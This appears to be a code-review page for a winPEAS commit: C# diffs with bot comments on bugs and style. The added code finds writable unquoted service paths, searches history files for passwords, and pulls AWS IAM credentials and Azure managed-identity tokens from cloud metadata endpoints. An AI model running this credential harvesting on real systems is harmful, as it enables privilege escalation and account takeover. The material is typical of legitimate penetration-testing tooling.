Beaprint.MainPrint("Cached Creds"); Beaprint.MainPrint("Cached Creds");
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#cached-credentials", "If > 0, credentials will be cached in the registry and accessible by SYSTEM user"); Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-protections#cached-credentials", "If > 0, credentials will be cached in the registry and accessible by SYSTEM user");
string cachedlogonscount = RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "CACHEDLOGONSCOUNT"); string cachedlogonscount = RegistryHelper.GetRegValue("HKLM", @"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "CACHEDLOGONSCOUNT");
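Review bot: `try{` puts the brace on the same line, unlike every other block in this file (the removed lines show the previous Allman-style layout); revert to the file's brace style.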

View File

@ -81,6 +81,7 @@ namespace winPEAS.Helpers
/---------------------------------------------------------------------------------\ /---------------------------------------------------------------------------------\
| {1}Do you like PEASS?{0} | | {1}Do you like PEASS?{0} |
|---------------------------------------------------------------------------------| |---------------------------------------------------------------------------------|
| {3}Get the latest version{0} : {2}https://github.com/sponsors/carlospolop{0} |
| {3}Follow on Twitter{0} : {2}@hacktricks_live{0} | | {3}Follow on Twitter{0} : {2}@hacktricks_live{0} |
| {3}Respect on HTB{0} : {2}SirBroccoli {0} | | {3}Respect on HTB{0} : {2}SirBroccoli {0} |
|---------------------------------------------------------------------------------| |---------------------------------------------------------------------------------|
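Review bot: the new banner row labels `https://github.com/sponsors/carlospolop` as "Get the latest version", but that URL is the sponsorship page, not a release download; either relabel the row ("Sponsor the project") or point it at the releases page already used by `LinpeasUrl`.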
@ -132,6 +133,7 @@ namespace winPEAS.Helpers
Console.WriteLine(LCYAN + " filesinfo" + GRAY + " Search generic files that can contains credentials" + NOCOLOR); Console.WriteLine(LCYAN + " filesinfo" + GRAY + " Search generic files that can contains credentials" + NOCOLOR);
Console.WriteLine(LCYAN + " fileanalysis" + GRAY + " Search specific files that can contains credentials and for regexes inside files" + NOCOLOR); Console.WriteLine(LCYAN + " fileanalysis" + GRAY + " Search specific files that can contains credentials and for regexes inside files" + NOCOLOR);
Console.WriteLine(LCYAN + " eventsinfo" + GRAY + " Display interesting events information" + NOCOLOR); Console.WriteLine(LCYAN + " eventsinfo" + GRAY + " Display interesting events information" + NOCOLOR);
Console.WriteLine(LCYAN + " cloudinfo" + GRAY + " Enumerate cloud information" + NOCOLOR);
Console.WriteLine(); Console.WriteLine();
Console.WriteLine(LCYAN + " quiet" + GRAY + " Do not print banner" + NOCOLOR); Console.WriteLine(LCYAN + " quiet" + GRAY + " Do not print banner" + NOCOLOR);
Console.WriteLine(LCYAN + " notcolor" + GRAY + " Don't use ansi colors (all white)" + NOCOLOR); Console.WriteLine(LCYAN + " notcolor" + GRAY + " Don't use ansi colors (all white)" + NOCOLOR);
@ -146,6 +148,11 @@ namespace winPEAS.Helpers
Console.WriteLine(LCYAN + " -lolbas" + GRAY + $" Run additional LOLBAS check" + NOCOLOR); Console.WriteLine(LCYAN + " -lolbas" + GRAY + $" Run additional LOLBAS check" + NOCOLOR);
Console.WriteLine(LCYAN + " -linpeas=[url]" + GRAY + $" Run additional linpeas.sh check for default WSL distribution, optionally provide custom linpeas.sh URL\n" + Console.WriteLine(LCYAN + " -linpeas=[url]" + GRAY + $" Run additional linpeas.sh check for default WSL distribution, optionally provide custom linpeas.sh URL\n" +
$" (default: {Checks.Checks.LinpeasUrl})" + NOCOLOR); $" (default: {Checks.Checks.LinpeasUrl})" + NOCOLOR);
Console.WriteLine(LCYAN + " -network" + GRAY + $" Run additional network scanning - find network interfaces, hosts and scan nmap top 1000 TCP ports for each host found\n" +
$" -network=\"auto\" - find interfaces/hosts automatically" + NOCOLOR + "\n" +
$" -network=\"10.10.10.10,10.10.10.20\" - scan only selected ip address(es)" + NOCOLOR + "\n" +
$" -network=\"10.10.10.10/24\" - scan host based on ip address/netmask" + NOCOLOR + "\n" +
$" -ports=\"80,443,8080\" - If a list of ports is provided, use this list instead of the nmap top 1000 TCP" + NOCOLOR);
} }
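Review bot: the help text for `-ports` should state that it only takes effect together with `-network` and, given the argument parsing in `Checks.cs`, must come after it on the command line; otherwise users will hit the "-network argument is not present" error with a valid-looking command. It should also say that the scan runs after the selected checks, whichever check list was chosen.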
@ -290,8 +297,7 @@ namespace winPEAS.Helpers
string value = entry.Value; string value = entry.Value;
string key = entry.Key; string key = entry.Key;
string line = ""; string line;
if (!no_gray) if (!no_gray)
{ {
line = ansi_color_gray + " " + key + ": " + NOCOLOR + value; line = ansi_color_gray + " " + key + ": " + NOCOLOR + value;

View File

@ -122,6 +122,51 @@ namespace winPEAS.Helpers
return binaryPath; return binaryPath;
} }
public static bool CheckQuoteAndSpaceWithPermissions(string path, out List<string> injectablePaths)
{
List<string> result = new List<string>();
bool isInjectable = false;
if (!path.Contains('"') && !path.Contains("'"))
{
if (path.Contains(" "))
{
string currentPath = string.Empty;
foreach (var pathPart in Regex.Split(path, @"\s"))
{
currentPath += pathPart + " ";
if (File.Exists(currentPath) || Directory.Exists(currentPath))
{
var permissions = PermissionsHelper.GetPermissionsFolder(currentPath, Checks.Checks.CurrentUserSiDs, PermissionType.WRITEABLE_OR_EQUIVALENT);
if (permissions.Any())
{
result.Add(currentPath);
isInjectable = true;
}
}
else
{
var firstPathPart = currentPath;
DirectoryInfo di = new DirectoryInfo(firstPathPart);
var exploitablePath = di.Parent.FullName;
var folderPermissions = PermissionsHelper.GetPermissionsFolder(exploitablePath, Checks.Checks.CurrentUserSiDs, PermissionType.WRITEABLE_OR_EQUIVALENT);
if (folderPermissions.Any())
{
result.Add(exploitablePath);
isInjectable = true;
};
}
}
}
}
injectablePaths = result.Select(i => i).Distinct().ToList();
return isInjectable;
}
public static bool CheckQuoteAndSpace(string path) public static bool CheckQuoteAndSpace(string path)
{ {
if (!path.Contains('"') && !path.Contains("'")) if (!path.Contains('"') && !path.Contains("'"))
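Review bot: `CheckQuoteAndSpaceWithPermissions` keeps walking after it has found the executable: once `currentPath` matches an existing file (the `File.Exists` branch), every following token of the command line (`-arg`, `/service`, ...) lands in the `else` branch and reports the executable's own directory as an injectable path, so the loop should `break` after the first existing file. The `else` branch also has no guard: `new DirectoryInfo(firstPathPart)` throws `ArgumentException` for tokens containing characters that are invalid in paths (arguments such as `*`, `?` or `|` reach this method via `command` in the scheduled-task hunk below), and `di.Parent` is null when `currentPath` is a drive root, which gives a `NullReferenceException`; wrap the body in try/catch or validate the token first. Minor: `currentPath` always carries a trailing space when it is tested, which only works because Win32 path normalization strips it, so use `currentPath.TrimEnd()` for the `Exists` checks and the `DirectoryInfo`; `result.Select(i => i).Distinct()` is just `result.Distinct()`; and there is a stray `;` after the closing brace of the inner `if`.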

View File

@ -24,6 +24,40 @@ namespace winPEAS.Helpers.Registry
return Microsoft.Win32.Registry.LocalMachine.OpenSubKey(path); return Microsoft.Win32.Registry.LocalMachine.OpenSubKey(path);
} }
public static bool WriteRegValue(string hive, string path, string keyName, string value)
{
try
{
RegistryKey regKey;
if (hive == "HKCU")
{
regKey = Microsoft.Win32.Registry.CurrentUser.OpenSubKey(path);
}
else if (hive == "HKU")
{
regKey = Microsoft.Win32.Registry.Users.OpenSubKey(path);
}
else
{
regKey = Microsoft.Win32.Registry.LocalMachine.OpenSubKey(path);
}
if (regKey == null)
{
return false;
}
regKey.SetValue(keyName, value, RegistryValueKind.String);
}
catch (Exception ex)
{
return false;
}
return true;
}
public static string GetRegValue(string hive, string path, string value) public static string GetRegValue(string hive, string path, string value)
{ {
// returns a single registry value under the specified path in the specified hive (HKLM/HKCU) // returns a single registry value under the specified path in the specified hive (HKLM/HKCU)
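Review bot: `WriteRegValue` can never succeed as written: `OpenSubKey(path)` with a single argument opens the key read-only, so `regKey.SetValue(...)` throws `UnauthorizedAccessException`, which the catch turns into `return false`. Open the key with `OpenSubKey(path, writable: true)`. Also wrap `regKey` in a `using` so the handle is released, and either log `ex` or drop the unused variable (it currently produces a compiler warning). `SetValue` is hard-coded to `RegistryValueKind.String`, which silently changes the type of any existing non-string value; let the caller pass the kind (see the `DefaultUid` use in `WSLHelper`, which is a DWORD value).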

View File

@ -5,8 +5,10 @@ using System.IO;
using System.Linq; using System.Linq;
using System.Management; using System.Management;
using System.Text.RegularExpressions; using System.Text.RegularExpressions;
using winPEAS.Checks;
using winPEAS.Helpers; using winPEAS.Helpers;
using winPEAS.Helpers.Registry; using winPEAS.Helpers.Registry;
using winPEAS.Helpers.YamlConfig;
namespace winPEAS.Info.ApplicationInfo namespace winPEAS.Info.ApplicationInfo
{ {
@ -256,6 +258,9 @@ namespace winPEAS.Info.ApplicationInfo
{ {
} }
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(filepath, out injectablePaths);
results.Add(new Dictionary<string, string>() results.Add(new Dictionary<string, string>()
{ {
{"Reg", autorunLocation[0] + "\\" + autorunLocation[1]}, {"Reg", autorunLocation[0] + "\\" + autorunLocation[1]},
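Review bot: `var injectablePaths = new List<string>();` followed by `out injectablePaths` allocates a list that is immediately discarded; `MyUtils.CheckQuoteAndSpaceWithPermissions(filepath, out var injectablePaths)` is enough. The same two-line pattern is repeated in each of the later hunks of this file. More importantly, this call sits outside any try/catch here and in the next hunk, so an exception thrown by the helper (it has no internal guard) aborts the whole autorun enumeration instead of skipping the one entry.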
@ -274,7 +279,7 @@ namespace winPEAS.Info.ApplicationInfo
"interestingFileRights", "interestingFileRights",
orig_filepath.Length > 1 ? string.Join(", ", PermissionsHelper.GetPermissionsFile(orig_filepath, Checks.Checks.CurrentUserSiDs)) : "" orig_filepath.Length > 1 ? string.Join(", ", PermissionsHelper.GetPermissionsFile(orig_filepath, Checks.Checks.CurrentUserSiDs)) : ""
}, },
{"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(filepath).ToString()} {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
}); });
} }
} }
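Review bot: the `isUnquotedSpaced` value changes type in this hunk: `bool.ToString()` produced `"True"`/`"False"`, while the new expression produces either a comma-joined list of paths or the lower-case literal `"false"`. Anything downstream that compared this entry against `"True"`/`"False"` or ran `bool.Parse` on it is not touched by this commit and needs checking. Also, the other list-valued entries in the same dictionary use `", "` as separator while this one uses `","`; be consistent, and note that a path can itself contain a comma.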
@ -299,6 +304,9 @@ namespace winPEAS.Info.ApplicationInfo
orig_filepath = Environment.ExpandEnvironmentVariables(orig_filepath).Replace("'", "").Replace("\"", ""); orig_filepath = Environment.ExpandEnvironmentVariables(orig_filepath).Replace("'", "").Replace("\"", "");
string folder = Path.GetDirectoryName(orig_filepath); string folder = Path.GetDirectoryName(orig_filepath);
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(orig_filepath, out injectablePaths);
results.Add(new Dictionary<string, string>() results.Add(new Dictionary<string, string>()
{ {
{"Reg", autorunLocation[0] + "\\" + reg}, {"Reg", autorunLocation[0] + "\\" + reg},
@ -317,7 +325,7 @@ namespace winPEAS.Info.ApplicationInfo
"interestingFileRights", "interestingFileRights",
orig_filepath.Length > 1 ? string.Join(", ", PermissionsHelper.GetPermissionsFile(orig_filepath, Checks.Checks.CurrentUserSiDs)) : "" orig_filepath.Length > 1 ? string.Join(", ", PermissionsHelper.GetPermissionsFile(orig_filepath, Checks.Checks.CurrentUserSiDs)) : ""
}, },
{"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(orig_filepath).ToString()} {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
}); });
} }
} }
@ -342,6 +350,12 @@ namespace winPEAS.Info.ApplicationInfo
string usersPath = Path.Combine(Environment.GetEnvironmentVariable(@"USERPROFILE")); string usersPath = Path.Combine(Environment.GetEnvironmentVariable(@"USERPROFILE"));
usersPath = Directory.GetParent(usersPath).FullName; usersPath = Directory.GetParent(usersPath).FullName;
var config = YamlConfigHelper.GetWindowsSearchConfig();
var pwdInsideHistory = config.variables.FirstOrDefault(v => v.name.Equals("pwd_inside_history", StringComparison.InvariantCultureIgnoreCase)).value;
// add .* around each element to match the whole line
var items = pwdInsideHistory.Split('|').Select(v => $".*{v}.*");
pwdInsideHistory = string.Join("|", items);
try try
{ {
if (Directory.Exists(usersPath)) if (Directory.Exists(usersPath))
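Review bot: `config.variables.FirstOrDefault(...)` returns null when no `pwd_inside_history` variable exists in the YAML, so `.value` throws `NullReferenceException` before the `try` that follows, taking down the whole check. Use `?.value` and skip the history search when it is null or empty. Splitting the variable on `|` and wrapping each piece in `.*` also assumes the value is a flat alternation; if the YAML pattern ever contains a grouped `(a|b)`, the split breaks the expression, so either document that constraint in the config or apply `.*` around the whole pattern once.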
@ -373,6 +387,14 @@ namespace winPEAS.Info.ApplicationInfo
foreach (string filepath in files) foreach (string filepath in files)
{ {
var fileContent = File.ReadAllText(filepath);
var sensitiveInfoList = FileAnalysis.SearchContent(fileContent, pwdInsideHistory, false);
// remove all non-printable and control characters
sensitiveInfoList = sensitiveInfoList.Select(s => s = Regex.Replace(s, @"\p{C}+", string.Empty)).ToList();
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(filepath, out injectablePaths);
string folder = Path.GetDirectoryName(filepath); string folder = Path.GetDirectoryName(filepath);
results.Add(new Dictionary<string, string>() { results.Add(new Dictionary<string, string>() {
{ "Reg", "" }, { "Reg", "" },
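Review bot: `CheckQuoteAndSpaceWithPermissions(filepath, ...)` is applied to a history text file, not to a command that gets executed, so the unquoted-path result is meaningless in this section (the replaced line passed `path`, a different variable, which looks like an old bug rather than behaviour to preserve); drop the check here and keep `isUnquotedSpaced` empty. In the cleanup lambda, `s => s = Regex.Replace(...)` assigns to the lambda parameter for no effect; `s => Regex.Replace(s, @"\p{C}+", string.Empty)` is all that is needed. `File.ReadAllText` on every history file found has no size bound; consider skipping files above a few MB so a large log does not stall the run.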
@ -383,7 +405,8 @@ namespace winPEAS.Info.ApplicationInfo
{ "isWritableReg", ""}, { "isWritableReg", ""},
{ "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))}, { "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))},
{ "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs))}, { "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs))},
{ "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(path).ToString() } {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" },
{ "sensitiveInfoList", string.Join(", ", sensitiveInfoList) },
}); });
} }
} }
@ -403,6 +426,9 @@ namespace winPEAS.Info.ApplicationInfo
{ {
try try
{ {
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(folder, out injectablePaths);
results.Add(new Dictionary<string, string>() { results.Add(new Dictionary<string, string>() {
{ "Reg", "" }, { "Reg", "" },
{ "RegKey", "" }, { "RegKey", "" },
@ -412,7 +438,7 @@ namespace winPEAS.Info.ApplicationInfo
{ "isWritableReg", ""}, { "isWritableReg", ""},
{ "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))}, { "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))},
{ "interestingFileRights", ""}, { "interestingFileRights", ""},
{ "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(folder).ToString() } {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
}); });
} }
catch (Exception) catch (Exception)
@ -447,6 +473,9 @@ namespace winPEAS.Info.ApplicationInfo
try try
{ {
string folder = Path.GetDirectoryName(filepathCleaned); string folder = Path.GetDirectoryName(filepathCleaned);
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(command, out injectablePaths);
results.Add(new Dictionary<string, string>() results.Add(new Dictionary<string, string>()
{ {
{"Reg", ""}, {"Reg", ""},
@ -463,7 +492,7 @@ namespace winPEAS.Info.ApplicationInfo
"interestingFileRights", "interestingFileRights",
string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs)) string.Join(", ", PermissionsHelper.GetPermissionsFile(filepath, Checks.Checks.CurrentUserSiDs))
}, },
{"isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(command).ToString()} {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
}); });
} }
catch (Exception) catch (Exception)
@ -505,6 +534,8 @@ namespace winPEAS.Info.ApplicationInfo
if (File.Exists(path)) if (File.Exists(path))
{ {
string folder = Path.GetDirectoryName(path); string folder = Path.GetDirectoryName(path);
var injectablePaths = new List<string>();
var isUnquotedSpaced = MyUtils.CheckQuoteAndSpaceWithPermissions(path, out injectablePaths);
results.Add(new Dictionary<string, string> results.Add(new Dictionary<string, string>
{ {
@ -516,7 +547,7 @@ namespace winPEAS.Info.ApplicationInfo
{ "isWritableReg", ""}, { "isWritableReg", ""},
{ "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))}, { "interestingFolderRights", string.Join(", ", PermissionsHelper.GetPermissionsFolder(folder, Checks.Checks.CurrentUserSiDs))},
{ "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(path, Checks.Checks.CurrentUserSiDs))}, { "interestingFileRights", string.Join(", ", PermissionsHelper.GetPermissionsFile(path, Checks.Checks.CurrentUserSiDs))},
{ "isUnquotedSpaced", MyUtils.CheckQuoteAndSpace(path).ToString() } {"isUnquotedSpaced", isUnquotedSpaced ? string.Join(",", injectablePaths) : "false" }
}); });
} }
} }

View File

@ -0,0 +1,201 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Net;
using winPEAS.Helpers;
namespace winPEAS.Info.CloudInfo
{
internal class AWSInfo : CloudInfoBase
{
/*
* notes - possible identification:
*
- "c:\Program Files\Amazon\EC2Launch"
- "C:\Program Files\Amazon\EC2Launch\service\EC2LaunchService.exe"
- "c:\Program Files (x86)\AWS SDK for .NET"
- get EC2_TOKEN: PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600", it should start with "AQ"
*/
const string AWS_FOLDER = "c:\\Program Files\\Amazon\\";
const string AWS_BASE_URL = "http://169.254.169.254/latest/api/token";
const string METADATA_URL_BASE = "http://169.254.169.254/latest/meta-data";
public override string Name => "AWS EC2";
private Dictionary<string, List<EndpointData>> _endpointData = null;
public override bool IsCloud => Directory.Exists(AWS_FOLDER);
public override Dictionary<string, List<EndpointData>> EndpointDataList()
{
if (_endpointData == null)
{
_endpointData = new Dictionary<string, List<EndpointData>>();
try
{
if (IsAvailable)
{
string API_TOKEN = CreateMetadataAPIRequest(AWS_BASE_URL, "PUT", new WebHeaderCollection { { "X-aws-ec2-metadata-token-ttl-seconds", "21600" } });
_endpointData.Add("General Info", GetGeneralMetadataInfo(API_TOKEN));
_endpointData.Add("Account Info", GetAccountMetadataInfo(API_TOKEN));
_endpointData.Add("Network Info", GetNetworkMetadataInfo(API_TOKEN));
_endpointData.Add("IAM Role", GetIAMRoleMetadataInfo(API_TOKEN));
_endpointData.Add("User Data", GetUserDataMetadataInfo(API_TOKEN));
_endpointData.Add("EC2 Security Credentials", GetSecurityCredentialsMetadataInfo(API_TOKEN));
/*
* print_3title "SSM Runnig"
ps aux 2>/dev/null | grep "ssm-agent" | grep -v "grep" | sed "s,ssm-agent,${SED_RED},"
*
*/
}
else
{
_endpointData.Add("General Info", new List<EndpointData>()
{
new EndpointData()
{
EndpointName = "",
Data = null,
IsAttackVector = false
}
});
}
}
catch (Exception ex)
{
Beaprint.PrintException(ex.Message);
}
}
return _endpointData;
}
private List<EndpointData> GetSecurityCredentialsMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("ec2-instance", "identity-credentials/ec2/security-credentials/ec2-instance", false),
};
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetUserDataMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("user-data", "latest/user-data", false),
};
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetIAMRoleMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>
{
new Tuple<string, string, bool>("iam/info", "iam/info", false)
};
var url = $"{METADATA_URL_BASE}/iam/security-credentials/";
var roles = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } });
foreach (var role in roles.Split('\n'))
{
metadataEndpoints.Add(new Tuple<string, string, bool>(role, $"iam/security-credentials/{role}", false));
}
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetNetworkMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>();
var url = $"{METADATA_URL_BASE}/network/interfaces/macs/";
var macs = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } });
var urlBase = "network/interfaces/macs";
foreach (var mac in macs.Split('\n'))
{
metadataEndpoints.Add(new Tuple<string, string, bool>("Owner ID", $"{urlBase}/{mac}/owner-id", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Public Hostname", $"{urlBase}/{mac}/public-hostname", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Security Groups", $"{urlBase}/{mac}/security-groups", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Private IPv4s", $"{urlBase}/{mac}/ipv4-associations/", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Subnet IPv4", $"{urlBase}/{mac}/subnet-ipv4-cidr-block", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Private IPv6s", $"{urlBase}/{mac}/ipv6s", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Subnet IPv6", $"{urlBase}/{mac}/subnet-ipv6-cidr-blocks", false));
metadataEndpoints.Add(new Tuple<string, string, bool>("Public IPv4s", $"{urlBase}/{mac}/public-ipv4s", false));
}
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetAccountMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("account info", "identity-credentials/ec2/info", false),
};
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetGeneralMetadataInfo(string apiToken)
{
var metadataEndpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("ami id", "ami-id", false),
new Tuple<string, string, bool>("instance action","instance-action", false),
new Tuple<string, string, bool>("instance id","instance-id", false),
new Tuple<string, string, bool>("instance life-cycle","instance-life-cycle", false),
new Tuple<string, string, bool>("instance type","instance-type", false),
new Tuple<string, string, bool>("placement/region","placement/region", false),
};
var result = GetMetadataInfo(metadataEndpoints, apiToken);
return result;
}
private List<EndpointData> GetMetadataInfo(List<Tuple<string, string, bool>> endpointData, string apiToken)
{
List<EndpointData> _endpointDataList = new List<EndpointData>();
foreach (var tuple in endpointData)
{
string url = $"{METADATA_URL_BASE}/{tuple.Item2}";
var result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "X-aws-ec2-metadata-token", apiToken } });
_endpointDataList.Add(new EndpointData()
{
EndpointName = tuple.Item1,
Data = result,
IsAttackVector = tuple.Item3
});
}
return _endpointDataList;
}
public override bool TestConnection()
{
return CreateMetadataAPIRequest(AWS_BASE_URL, "GET") != null;
}
}
}
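Review bot: the user-data endpoint is built as `{METADATA_URL_BASE}/latest/user-data`, which expands to `http://169.254.169.254/latest/meta-data/latest/user-data`; IMDS serves user data at `http://169.254.169.254/latest/user-data`, outside `meta-data/`, so this entry will always come back empty. Either special-case that URL or let `GetMetadataInfo` accept an absolute URL. Two more points: `roles.Split('\n')` and `macs.Split('\n')` dereference the result of `CreateMetadataAPIRequest`, which returns null on a socket error, so a transient failure becomes a `NullReferenceException` that the outer catch turns into a lost section (guard with a null/empty check before splitting); and `TestConnection` issues a GET to the IMDSv2 token endpoint, which only accepts PUT, so availability is currently inferred from a 405 error response rather than from a successful call. The commented-out ssm-agent shell snippet should become a TODO or be removed.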

View File

@ -0,0 +1,88 @@
using System.Collections.Generic;
using System.IO;
using System.Net;
using System;
namespace winPEAS.Info.CloudInfo
{
internal class AzureInfo : CloudInfoBase
{
public override string Name => "Azure VM";
public override bool IsCloud => Directory.Exists(WINDOWS_AZURE_FOLDER);
private Dictionary<string, List<EndpointData>> _endpointData = null;
const string WINDOWS_AZURE_FOLDER = "c:\\windowsazure";
const string AZURE_BASE_URL = "http://169.254.169.254/metadata/";
const string API_VERSION = "2021-12-13";
public override Dictionary<string, List<EndpointData>> EndpointDataList()
{
if (_endpointData == null)
{
_endpointData = new Dictionary<string, List<EndpointData>>();
List<EndpointData> _endpointDataList = new List<EndpointData>();
try
{
string result;
List<Tuple<string, string, bool>> endpoints = new List<Tuple<string, string, bool>>()
{
new Tuple<string, string, bool>("Instance Details", $"instance?api-version={API_VERSION}", false),
new Tuple<string, string, bool>("Load Balancer details", $"loadbalancer?api-version={API_VERSION}", false),
new Tuple<string, string, bool>("Management token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://management.azure.com/", true),
new Tuple<string, string, bool>("Graph token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://graph.microsoft.com/", true),
new Tuple<string, string, bool>("Vault token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://vault.azure.net/", true),
new Tuple<string, string, bool>("Storage token", $"identity/oauth2/token?api-version={API_VERSION}&resource=https://storage.azure.com/", true)
};
if (IsAvailable)
{
foreach (var tuple in endpoints)
{
string url = $"{AZURE_BASE_URL}{tuple.Item2}";
result = CreateMetadataAPIRequest(url, "GET", new WebHeaderCollection() { { "Metadata", "true" } });
_endpointDataList.Add(new EndpointData()
{
EndpointName = tuple.Item1,
Data = result,
IsAttackVector = tuple.Item3
});
}
}
else
{
foreach (var endpoint in endpoints)
{
_endpointDataList.Add(new EndpointData()
{
EndpointName = endpoint.Item1,
Data = null,
IsAttackVector = false
});
}
}
_endpointData.Add("General", _endpointDataList);
}
catch (Exception ex)
{
}
}
return _endpointData;
}
public override bool TestConnection()
{
return CreateMetadataAPIRequest(AZURE_BASE_URL, "GET") != null;
}
}
}
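Review bot: `catch (Exception ex) { }` swallows every failure silently and leaves `ex` unused; `AWSInfo` and `GCPInfo` call `Beaprint.PrintException(ex.Message)` at the same point, so do the same here so a failing metadata query is visible in the output. `TestConnection` also sends the probe without the `Metadata: true` header that every other request in this class sets; Azure IMDS rejects such requests with 400, so the probe only "works" because `CreateMetadataAPIRequest` maps an HTTP error response to `string.Empty`. Pass the header in the probe as well.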

View File

@ -0,0 +1,77 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Text;
namespace winPEAS.Info.CloudInfo
{
internal abstract class CloudInfoBase
{
public abstract string Name { get; }
public abstract bool IsCloud { get; }
public abstract Dictionary<string, List<EndpointData>> EndpointDataList();
public abstract bool TestConnection();
private bool? _isAvailable;
public bool IsAvailable
{
get
{
if (_isAvailable == null)
{
_isAvailable = TestConnection();
}
return _isAvailable.Value;
}
}
protected string CreateMetadataAPIRequest(string url, string method, WebHeaderCollection headers = null)
{
try
{
var request = WebRequest.CreateHttp(url);
if (headers != null)
{
request.Headers = headers;
}
request.Method = method;
using (var response = (HttpWebResponse)request.GetResponse())
{
using (var responseStream = response.GetResponseStream())
{
// Get a reader capable of reading the response stream
using (var myStreamReader = new StreamReader(responseStream, Encoding.UTF8))
{
// Read stream content as string
var content = myStreamReader.ReadToEnd();
return content;
}
}
}
}
catch (WebException exception)
{
if (exception.InnerException != null)
{
return typeof(SocketException) == exception.InnerException.GetType() ? null : string.Empty;
}
}
catch (Exception ex)
{
return string.Empty;
}
return string.Empty;
}
}
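Review bot: `CreateMetadataAPIRequest` never sets `request.Timeout`, so `HttpWebRequest` uses its 100-second default; on a host where 169.254.169.254 is unroutable (and the AWS/GCP `IsCloud` folder tests can be true on any machine with the vendor SDK installed), each call can block for that long and `EndpointDataList` makes dozens of them. Set a short timeout of a few seconds. The error mapping is also wrong for that case: a timeout surfaces as a `WebException` with `Status == WebExceptionStatus.Timeout` and typically no `InnerException`, so it returns `string.Empty` rather than null and `IsAvailable` becomes true. Branch on `exception.Status` (`ConnectFailure`, `Timeout`, `NameResolutionFailure` map to null) instead of checking the inner exception type, and consider returning the HTTP status for `ProtocolError` so callers can tell "endpoint absent" from "empty body". The `ex` in the generic catch is unused.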
}

View File

@ -0,0 +1,10 @@
namespace winPEAS.Info.CloudInfo
{
internal class EndpointData
{
public string EndpointName { get; set; }
public string Data { get; set; }
public bool IsAttackVector { get; set; }
}
}

View File

@ -0,0 +1,208 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Net;
using winPEAS.Helpers;
namespace winPEAS.Info.CloudInfo
{
internal class GCPInfo : CloudInfoBase
{
public override string Name => "Google Cloud Platform";
const string GCP_BASE_URL = "http://{URL_BASE}/";
const string GCP_FOLDER = "C:\\Program Files\\Google\\Compute Engine\\";
/*
